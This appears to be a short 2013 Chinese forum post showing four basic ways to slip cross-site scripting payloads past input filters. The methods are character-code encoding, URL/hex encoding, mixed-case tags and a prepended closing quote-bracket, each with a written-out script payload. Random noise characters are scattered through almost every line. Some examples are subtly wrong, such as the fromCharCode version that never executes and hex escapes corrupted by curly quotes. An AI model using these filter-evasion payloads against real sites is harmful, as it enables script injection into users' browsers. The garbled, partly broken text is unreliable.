四种超级基础的绕过方法。5 K2 {5 o. V! c" j0 N
1.转换为ASCII码
6 Z! Y: f3 U5 ]3 P8 _# D5 v7 a例子:原脚本为<script>alert(‘I love F4ck’)</script >. F4 y& t+ Y7 k% d1 @1 t
通过转换,变成:( k- T& D* o# A1 w
<script>String.fromCharCode(97, 108, 101, 114, 116, 40, 8216, 73, 32, 108, 111, 118, 101, 32, 70, 52, 99, 107, 8217, 41) </script>2 y; ^/ {4 C1 y( _! y7 E
7 B. v9 L* ? y
2.转换为HEX(十六进制)& z K! H! i* R( L# {! n" k" @
例子:原脚本为<script>alert(‘I love F4ck’)</script>
1 _$ Z% r- Q, \5 q. ?- A6 A通过转换,变成:8 E) |( ]( O: H' |- e' I( y
%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%2018%49%20%6c%6f%76%65%20%46%34%63%6b%2019%29%3c%2f%73%63%72%69%70%74%3e
* p$ y. k$ d8 }3 @1 v& L 2 N4 ]- Y$ m* {4 N- ?
3.转换脚本的大小写
8 L ?6 q! t1 v9 w5 G例子:原脚本为<script>alert(‘I love F4ck’)</script>2 b6 Q( X }0 U. g: l( ~0 K1 z3 g
转换为:<ScRipt>AleRt(‘I love F4ck’)</sCRipT>
/ r+ x$ G& v) }9 n- j1 H) w d0 q& F6 S$ z- w. ~
4.增加闭合标记”>+ M0 y0 J# @1 `7 r6 f) Y
例子:原脚本为<script>alert(‘I love F4ck’)</script> a+ p: l, c* f, z i
转换为:”><script>alert(‘I love F4ck’)</script>
2 E1 C n0 r9 P& c/ `; y, A更详细绕过技术请参考此网页7 {& d! \; p- K* S0 R9 B: N, t+ P
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
7 u0 L4 K0 b p2 b1 U
( i" G3 i: p a. l; N. l2 Q转换工具使用的是火狐的 hackbar mozilla addon. |
发表于 2013-2-14 00:10:39
收藏
支持
反对